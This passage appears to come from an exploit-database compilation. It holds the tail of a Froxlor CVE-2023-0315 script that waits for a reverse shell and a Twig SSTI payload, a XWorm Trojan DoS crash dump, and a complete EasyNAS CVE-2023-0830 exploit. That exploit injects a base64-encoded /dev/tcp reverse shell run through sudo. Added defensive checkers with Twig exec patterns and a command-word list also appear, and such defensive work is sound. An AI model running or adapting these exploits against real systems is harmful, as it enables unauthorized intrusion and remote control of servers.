    s.bind(("0.0.0.0", int(port)))
    s.listen(1)
    conn, addr = s.accept()
    print("[+] Connection received from %s" % addr[0])
    t.sock = conn
    print("[+] Heads up, incoming shell!!")
    t.interact()


if login():
    print("[+] Successfully Logged in!")
    index_url = url + "/admin_index.php"
    request.get(index_url)
    if change_log_path():
        inject_template()
else:
    print("[-] Can't login")
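The chain above has two halves a defender can look for after the fact: the logger's output file was pointed at a Twig template, and a theme name carrying `{{[...]|filter('exec')}}` was logged into it. The block below is an added example, not part of the advisory and not Froxlor code: it walks a templates tree for Twig expressions that hand a value to a command-executing PHP callable, and checks whether a configured `logger_logfile` would be parsed by Twig at all. The paths and the sample template tree are constructed for the example.

```python
"""Triage check for the CVE-2023-0315 Froxlor chain (added example, not Froxlor code).

Looks for Twig templates that pipe a value into filter/map/reduce/sort with a
command-executing PHP function, and for a logger path that Twig would render.
All paths and sample files here are constructed.
"""
import os
import re
import tempfile

# Twig passes the quoted name to a PHP callable; spacing inside the expression varies
_EXEC_FILTER = re.compile(
    r"\|\s*(filter|map|reduce|sort)\s*\(\s*['\"]"
    r"(exec|system|passthru|shell_exec|popen|proc_open)['\"]",
    re.IGNORECASE,
)


def find_twig_exec(templates_root):
    """Return (path, line_no, line) for every .twig file under templates_root
    that contains a filter/map/reduce/sort call into a command-executing function."""
    hits = []
    for dirpath, _, filenames in os.walk(templates_root):
        for name in sorted(filenames):
            if not name.endswith(".twig"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                for no, line in enumerate(fh, 1):
                    if _EXEC_FILTER.search(line):
                        hits.append((path, no, line.rstrip("\n")))
    return hits


def logfile_is_template(logfile, templates_root):
    """True if the configured logger_logfile would be parsed by Twig:
    it ends in .twig or lives anywhere under the templates tree."""
    logfile = os.path.abspath(logfile)
    root = os.path.abspath(templates_root)
    return logfile.endswith(".twig") or os.path.commonpath([logfile, root]) == root


def make_sample_tree():
    """Constructed fixture: one clean template and one that carries the logged
    SSTI payload in the shape the exploit above produces. Returns (templates_root, poisoned_path)."""
    root = tempfile.mkdtemp(prefix="froxlor-triage-")
    tpl = os.path.join(root, "templates", "Froxlor")
    os.makedirs(tpl)
    with open(os.path.join(tpl, "header.html.twig"), "w") as fh:
        fh.write("<header>{{ page_title|e }}</header>\n")
    poisoned = os.path.join(tpl, "footer.html.twig")
    with open(poisoned, "w") as fh:
        fh.write("[information] admin changed theme to {{['id']|filter('exec')}}\n")
    return os.path.join(root, "templates"), poisoned


if __name__ == "__main__":
    templates, _ = make_sample_tree()
    for path, no, line in find_twig_exec(templates):
        print(f"{path}:{no}: {line}")
    # Assumed settings values; compare against what the admin panel / database shows
    for candidate in ("/var/www/html/froxlor/templates/Froxlor/footer.html.twig", "/var/log/froxlor/froxlor.log"):
        print(candidate, "-> rendered by Twig" if logfile_is_template(candidate, "/var/www/html/froxlor/templates") else "-> plain log")
```

On a real host run `find_twig_exec()` against the Froxlor `templates/` directory and `logfile_is_template()` against the `logger_logfile` value from the settings table; a hit in either means the template tree needs restoring from a known-good copy, not just the setting reverted.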
-
Provide Server v.14.4 XSS - CSRF & Remote Code Execution (RCE)
# Exploit Title: Provide Server v.14.4 XSS - CSRF & Remote Code Execution (RCE)
# Date: 2023-02-10
# Exploit Author: Andreas Finstad
# Version: < 14.4.1.29
# Tested on: Windows Server 2022
# CVE : CVE-2023-23286

POC: https://f20.be/blog/provide-server-14-4
-
XWorm Trojan 2.1 - Null Pointer Dereference DoS
# Exploit Title: XWorm Trojan 2.1 - Null Pointer Dereference DoS
# Exploit Author: TOUHAMI KASBAOUI
# Vendor Homepage: https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/
# Software Link: N/A
# Version: 2.1
# Tested on: Windows 10
# CVE : N/A

==================================================================
THE BUG : NULL pointer dereference -> DOS crash
==================================================================

The sophisticated XWorm Trojan is well exploited by EvilCoder, who combine different features such as ransomware and keylogger TAs to make it more risky for victims. The Trojan assigned to victims suffers from a NULL pointer dereference vulnerability, which could lead to a denial of service for the threat actor's server builder once its command-and-control IP address and port are obtained.

==================================================================
WINDBG ANALYSIS AFTER SENDING 1000 'A' BYTES
==================================================================

(160.b98): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0330c234 ebx=0113e8d4 ecx=00000000 edx=018c0000 esi=0330c234 edi=0113e55c
eip=078f5a59 esp=0113e4f8 ebp=0113e568 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
builder!XWorm.Client.isDisconnected+0xa9:
078f5a59 8b01            mov     eax,dword ptr [ecx]  ds:002b:00000000=????????
******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* MethodDesc: 055a86b4 Method Name: XWorm.Client.isDisconnected() Class: 09fe9634 MethodTable: 055a86d8 mdToken: 06000730 Module: 01464044 IsJitted: yes CodeAddr: 078f59b0 Transparency: Critical MethodDesc: 055a86b4 Method Name: XWorm.Client.isDisconnected() Class: 09fe9634 MethodTable: 055a86d8 mdToken: 06000730 Module: 01464044 IsJitted: yes CodeAddr: 078f59b0 Transparency: Critical Failed to request MethodData, not in JIT code range KEY_VALUES_STRING: 1 Key : AV.Dereference Value: NullPtr Key : AV.Fault Value: Read Key : Analysis.CPU.mSec Value: 6406 Key : Analysis.DebugAnalysisManager Value: Create Key : Analysis.Elapsed.mSec Value: 12344 Key : Analysis.IO.Other.Mb Value: 152 Key : Analysis.IO.Read.Mb Value: 3 Key : Analysis.IO.Write.Mb Value: 181 Key : Analysis.Init.CPU.mSec Value: 48905 Key : Analysis.Init.Elapsed.mSec Value: 6346579 Key : Analysis.Memory.CommitPeak.Mb Value: 200 Key : CLR.BuiltBy Value: NET48REL1LAST_C Key : CLR.Engine Value: CLR Key : CLR.Version Value: 4.8.4515.0 Key : Timeline.OS.Boot.DeltaSec Value: 7496 Key : Timeline.Process.Start.DeltaSec Value: 6371 Key : WER.OS.Branch Value: vb_release Key : WER.OS.Timestamp Value: 2019-12-06T14:06:00Z Key : WER.OS.Version Value: 10.0.19041.1 Key : WER.Process.Version Value: 2.1.0.0 NTGLOBALFLAG: 0 PROCESS_BAM_CURRENT_THROTTLED: 0 PROCESS_BAM_PREVIOUS_THROTTLED: 0 APPLICATION_VERIFIER_FLAGS: 0 EXCEPTION_RECORD: (.exr -1) ExceptionAddress: 078f5a59 (builder!XWorm.Client.isDisconnected+0x000000a9) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 00000000 Parameter[1]: 00000000 Attempt to read from address 00000000 FAULTING_THREAD: 00000b98 PROCESS_NAME: builder.exe READ_ADDRESS: 00000000 ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory 
at 0x%p. The memory could not be %s. EXCEPTION_CODE_STR: c0000005 EXCEPTION_PARAMETER1: 00000000 EXCEPTION_PARAMETER2: 00000000 IP_ON_HEAP: 078f5a59 The fault address in not in any loaded module, please check your build's rebase log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may contain the address if it were loaded. STACK_TEXT: 0113e568 73140556 00000000 00000000 00000000 builder!XWorm.Client.isDisconnected+0xa9 0113e574 7314373a 0113e8d4 0113e5b8 732dd3f0 clr!CallDescrWorkerInternal+0x34 0113e5c8 7321f0d1 c887551e 00000000 0335b7dc clr!CallDescrWorkerWithHandler+0x6b 0113e608 7321f1d6 731d7104 0335b7dc 055ab280 clr!CallDescrWorkerReflectionWrapper+0x55 0113e90c 7212853c 00000000 0330a1dc 00000000 clr!RuntimeMethodHandle::InvokeMethod+0x838 0113e930 72114a9d 00000000 00000000 00000000 mscorlib_ni! 0113e94c 6e14bf55 00000000 00000000 00000000 mscorlib_ni! 0113e968 6e14be68 00000000 00000000 00000000 System_Windows_Forms_ni! 0113e990 72118604 00000000 00000000 00000000 System_Windows_Forms_ni! 0113e9f4 72118537 00000000 00000000 00000000 mscorlib_ni! 0113ea08 721184f4 00000000 00000000 00000000 mscorlib_ni! 0113ea24 6e14bdfa 00000000 00000000 00000000 mscorlib_ni! 0113ea40 6e14bb9a 00000000 00000000 00000000 System_Windows_Forms_ni! 0113ea80 6e13b07f 00000000 00000000 00000000 System_Windows_Forms_ni! 0113eacc 6e144931 00000000 00000000 00000000 System_Windows_Forms_ni! 0113ead8 6e1445f7 00000000 00000000 00000000 System_Windows_Forms_ni! 0113eaec 6e13af53 00000000 00000000 00000000 System_Windows_Forms_ni! 0113eaf4 6e13aee5 00000000 00000000 00000000 System_Windows_Forms_ni! 0113eb08 6e13a820 00000000 00000000 00000000 System_Windows_Forms_ni! 0113eb58 0146d08e 00000000 00000000 00000000 System_Windows_Forms_ni! WARNING: Frame IP not in any known module. Following frames may be wrong. 
0113eb8c 7650148b 000606f4 0000c250 00000000 0x146d08e 0113ebb8 764f844a 05823e56 000606f4 0000c250 USER32!_InternalCallWinProc+0x2b 0113ec9c 764f61ba 05823e56 00000000 0000c250 USER32!UserCallWinProcCheckWow+0x33a 0113ed10 764f5f80 0113ed98 0113ed58 6e19e5ed USER32!DispatchMessageWorker+0x22a 0113ed1c 6e19e5ed 0113ed98 c9b28348 731410fc USER32!DispatchMessageW+0x10 0113ed58 6e14b44f 00000000 00000000 00000000 System_Windows_Forms_ni+0x22e5ed 0113eddc 6e14b03d 00000000 00000000 00000000 System_Windows_Forms_ni! 0113ee30 6e14ae93 00000000 00000000 00000000 System_Windows_Forms_ni! 0113ee5c 014b2694 00000000 00000000 00000000 System_Windows_Forms_ni! 0113ee84 014b2211 00000000 00000000 00000000 0x14b2694 0113eeac 014b1871 00000000 00000000 00000000 0x14b2211 0113eef8 014b08b7 00000000 00000000 00000000 0x14b1871 0113ef28 73140556 00000000 00000000 00000000 builder!XWorm.My.MyApplication.Main+0x6f 0113ef34 7314373a 0113efc4 0113ef78 732dd3f0 clr!CallDescrWorkerInternal+0x34 0113ef88 73149adb 00000000 030622ec 73171e90 clr!CallDescrWorkerWithHandler+0x6b 0113eff0 732bff7b 0113f0cc c8874202 01466f94 clr!MethodDescCallSite::CallTargetWorker+0x16a 0113f114 732c065a 0113f158 00000000 c8874096 clr!RunMain+0x1b3 0113f380 732c0587 00000000 c8874b72 00700000 clr!Assembly::ExecuteMainMethod+0xf7 0113f864 732c0708 c8874baa 00000000 00000000 clr!SystemDomain::ExecuteMainMethod+0x5ef 0113f8bc 732c082e c8874bea 00000000 732bc210 clr!ExecuteEXE+0x4c 0113f8fc 732bc235 c8874a2e 00000000 732bc210 clr!_CorExeMainInternal+0xdc 0113f938 7398fa84 84112dff 73a24330 7398fa20 clr!_CorExeMain+0x4d 0113f970 73a1e81e 73a24330 73980000 0113f998 mscoreei!_CorExeMain+0xd6 0113f980 73a24338 73a24330 76b600f9 00f94000 MSCOREE!ShellShim__CorExeMain+0x9e 0113f998 76b600f9 00f94000 76b600e0 0113f9f4 MSCOREE!_CorExeMain_Exported+0x8 0113f998 77997bbe 00f94000 3d39c64a 00000000 KERNEL32!BaseThreadInitThunk+0x19 0113f9f4 77997b8e ffffffff 779b8d3f 00000000 ntdll!__RtlUserThreadStart+0x2f 0113fa04 00000000 
00000000 00000000 00000000 ntdll!_RtlUserThreadStart+0x1b STACK_COMMAND: ~0s ; .cxr ; kb SYMBOL_NAME: builder!XWorm.Client.isDisconnected+a9 MODULE_NAME: builder IMAGE_NAME: builder.exe FAILURE_BUCKET_ID: NULL_POINTER_READ_c0000005_builder.exe!XWorm.Client.isDisconnected OS_VERSION: 10.0.19041.1 BUILDLAB_STR: vb_release OSPLATFORM_TYPE: x86 OSNAME: Windows 10 IMAGE_VERSION: 2.1.0.0 FAILURE_ID_HASH: {ab0d02c5-881b-c628-2858-a241c5c41b1f} Followup: MachineOwner --------- TS: Exploitable - Data from Faulting Address controls Code Flow starting at builder!XWorm.Client.isDisconnected+0x00000000000000a9 (Hash=0xc8c3bc2d.0x7badd95a)
-
EasyNas 1.1.0 - OS Command Injection
# Exploit Title: EasyNas 1.1.0 - OS Command Injection
# Date: 2023-02-9
# Exploit Author: Ivan Spiridonov ([email protected])
# Author Blog: https://xbz0n.medium.com
# Version: 1.0.0
# Vendor home page : https://www.easynas.org
# Authentication Required: Yes
# CVE : CVE-2023-0830

```python
#!/usr/bin/python3
import requests
import sys
import base64
import urllib.parse
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# Disable the insecure request warning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

if len(sys.argv) < 6:
    print("Usage: ./exploit.py http(s)://url username password listenerIP listenerPort")
    sys.exit()

url = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]

# Create the payload
payload = "/bin/sh -i >& /dev/tcp/{}/{} 0>&1".format(sys.argv[4], sys.argv[5])
# Encode the payload in base64
payload = base64.b64encode(payload.encode()).decode()
# URL encode the payload
payload = urllib.parse.quote(payload)

# Create the login data
login_data = {
    'usr': user,
    'pwd': password,
    'action': 'login'
}

# Create a session
session = requests.Session()

# Send the login request
print("Sending login request...")
login_response = session.post(f"https://{url}/easynas/login.pl", data=login_data, verify=False)

# Check if the login was successful
if 'Login to EasyNAS' in login_response.text:
    print("Unsuccessful login")
    sys.exit()
else:
    print("Login successful")

# Send the exploit request
timeout = 3
try:
    exploit_response = session.get(
        f'https://{url}/easynas/backup.pl?action=backup&menu=none&.submit=Backup&name=%7cecho+{payload}+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23',
        headers={'User-Agent': 'Mozilla/5.0 Gecko/20100101 Firefox/72.0'},
        timeout=timeout,
        verify=False)
    if exploit_response.status_code != 200:
        print("[+] Everything seems ok, check your listener.")
    else:
        print("[-] Exploit failed, system is patched or credentials are wrong.")
except requests.exceptions.ReadTimeout:
    print("[-] Everything seems ok, check your listener.")
sys.exit()
```
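A defender-side check for the request shape this PoC sends, as an added example that is not part of the advisory: it parses web-server access-log lines (the sample lines below are constructed, not from the page), decodes the `name` parameter of `/easynas/backup.pl` the way the CGI would, and flags values carrying shell metacharacters or a decode-and-execute chain. The log format and word list are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined access-log format (not taken from the page).
SAMPLE_LOG = """\
10.0.0.5 - - [09/Feb/2023:10:01:12 +0000] "GET /easynas/backup.pl?action=backup&menu=none&.submit=Backup&name=nightly HTTP/1.1" 200 512
10.0.0.9 - - [09/Feb/2023:10:03:44 +0000] "GET /easynas/backup.pl?action=backup&menu=none&.submit=Backup&name=%7cecho+AAAA+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23 HTTP/1.1" 200 0
10.0.0.9 - - [09/Feb/2023:10:04:01 +0000] "GET /easynas/index.pl?name=%7c HTTP/1.1" 200 80
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# Characters that let a value escape a single shell word; a backup name never needs them.
SHELL_META = re.compile(r'[|;&`$<>\n]')
# Words typical of a decode-then-execute chain like the one in the advisory (assumed list).
SUSPICIOUS_WORDS = {"base64", "sudo", "sh", "bash", "nc", "curl", "wget"}

def inspect_backup_request(target):
    """Findings for one request target; empty list when nothing looks injected."""
    parts = urlsplit(target)
    if not parts.path.endswith("/easynas/backup.pl"):
        return []
    findings = []
    # parse_qs percent-decodes and turns '+' into spaces, as the CGI does.
    for name in parse_qs(parts.query, keep_blank_values=True).get("name", []):
        if SHELL_META.search(name):
            findings.append("shell metacharacter in name")
        words = set(re.findall(r"[a-z0-9]+", name.lower()))
        hits = sorted(words & SUSPICIOUS_WORDS)
        if hits:
            findings.append("command words: " + ",".join(hits))
    return findings

def scan_access_log(text):
    """(ip, timestamp, findings) for each backup.pl request that looks injected."""
    alerts = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        findings = inspect_backup_request(m.group("target"))
        if findings:
            alerts.append((m.group("ip"), m.group("ts"), findings))
    return alerts

if __name__ == "__main__":
    for ip, ts, findings in scan_access_log(SAMPLE_LOG):
        print(f"{ts} {ip}: {'; '.join(findings)}")
```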